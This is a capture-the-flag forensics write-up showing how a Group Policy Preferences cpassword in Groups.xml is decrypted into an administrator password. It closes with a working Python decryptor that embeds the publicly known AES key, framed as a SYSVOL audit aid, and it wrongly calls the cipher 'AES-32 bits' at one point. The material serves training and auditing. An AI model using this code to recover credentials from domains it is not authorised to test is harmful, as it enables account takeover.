RingZer0-51 - I Lost My Password Can You Find it?
Forensics
I Lost my password can you find it?
The archive that we downloaded has a few files and a lot of directories.
find . -type f
./{C7BD6C6D-A1C8-4C23-815E-3D8D4187640F}/GPT.INI
./{C7BD6C6D-A1C8-4C23-815E-3D8D4187640F}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./{874C2133-64E1-4F2C-8BD8-71D9BD59643D}/GPT.INI
./{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
./{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}/GPT.INI
./{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}/User/Preferences/Groups/Groups.xml
./{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}/Group Policy/GPE.INI
./{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
Most of these files are useless; the one that matters is Groups.xml, which contains what we need.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="1" changed="2014-02-06 19:33:28" uid="{C73C0939-38FB-4287-AC48-478F614F5EF7}" userContext="0" removePolicy="0">
    <Properties action="R" fullName="Administrator" description="Administrator" cpassword="PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" subAuthority="" userName="Administrator (built-in)"/>
  </User>
</Groups>
The cpassword field can be decrypted. The password is encrypted with AES-32 bits, and the same AES key is used for every cpassword, so once you have that key you can decrypt any of them. The key is documented here:
http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
We'll use the following script to decrypt it. I didn't make it, I found it here:
https://raw.githubusercontent.com/leonteale/pentestpackage/master/Gpprefdecrypt.py
python Gpprefdecrypt.py PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw
LocalRoot!
The flag is LocalRoot!
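To show what the script above actually does, and why any cpassword sitting in SYSVOL is a finding rather than a secret, here is an added example (my own code, not the write-up's or Gpprefdecrypt.py) that pulls the cpassword attributes out of a Groups.xml and decrypts them with the AES-256 key published in MS-GPPREF. The Groups.xml sample is constructed from the one on this page, trimmed to the attributes that matter; it assumes either the `cryptography` package or pycryptodome is installed for the AES step.

```python
import base64
import xml.etree.ElementTree as ET

# The AES-256 key published in MS-GPPREF (the Microsoft document linked above).
# Because it is public, every cpassword readable in SYSVOL is recoverable (MS14-025).
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

# Constructed sample: the Groups.xml from the archive, trimmed to the relevant item.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User name="Administrator (built-in)" changed="2014-02-06 19:33:28">
    <Properties action="R" userName="Administrator (built-in)"
      cpassword="PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw"/>
  </User>
</Groups>"""


def find_cpasswords(xml_text):
    """Return (userName, cpassword) for every Properties element carrying a cpassword.
    Each hit is an audit finding on its own, whether or not you decrypt it."""
    root = ET.fromstring(xml_text)
    return [(p.get("userName", "?"), p.get("cpassword"))
            for p in root.iter("Properties") if p.get("cpassword")]


def cpassword_bytes(cpassword):
    """GPP strips the base64 '=' padding; restore it before decoding."""
    return base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))


def aes_cbc_decrypt(key, iv, data):
    """AES-CBC decryption via `cryptography`, falling back to pycryptodome."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return dec.update(data) + dec.finalize()
    except ImportError:
        from Crypto.Cipher import AES
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)


def decrypt_cpassword(cpassword):
    """AES-256-CBC with an all-zero IV, PKCS#7 padding, UTF-16LE plaintext."""
    plain = aes_cbc_decrypt(GPP_KEY, bytes(16), cpassword_bytes(cpassword))
    pad = plain[-1]
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding: wrong key or corrupted cpassword")
    return plain[:-pad].decode("utf-16-le")


def aes_available():
    """True when one of the supported AES backends can be imported."""
    try:
        aes_cbc_decrypt(GPP_KEY, bytes(16), bytes(16))
        return True
    except ImportError:
        return False
```

Running `decrypt_cpassword` on each value returned by `find_cpasswords(SAMPLE_GROUPS_XML)` yields LocalRoot!; the same walk over every Preferences XML under `\\domain\SYSVOL` is how you find the policies that still carry cpassword values and need to be removed.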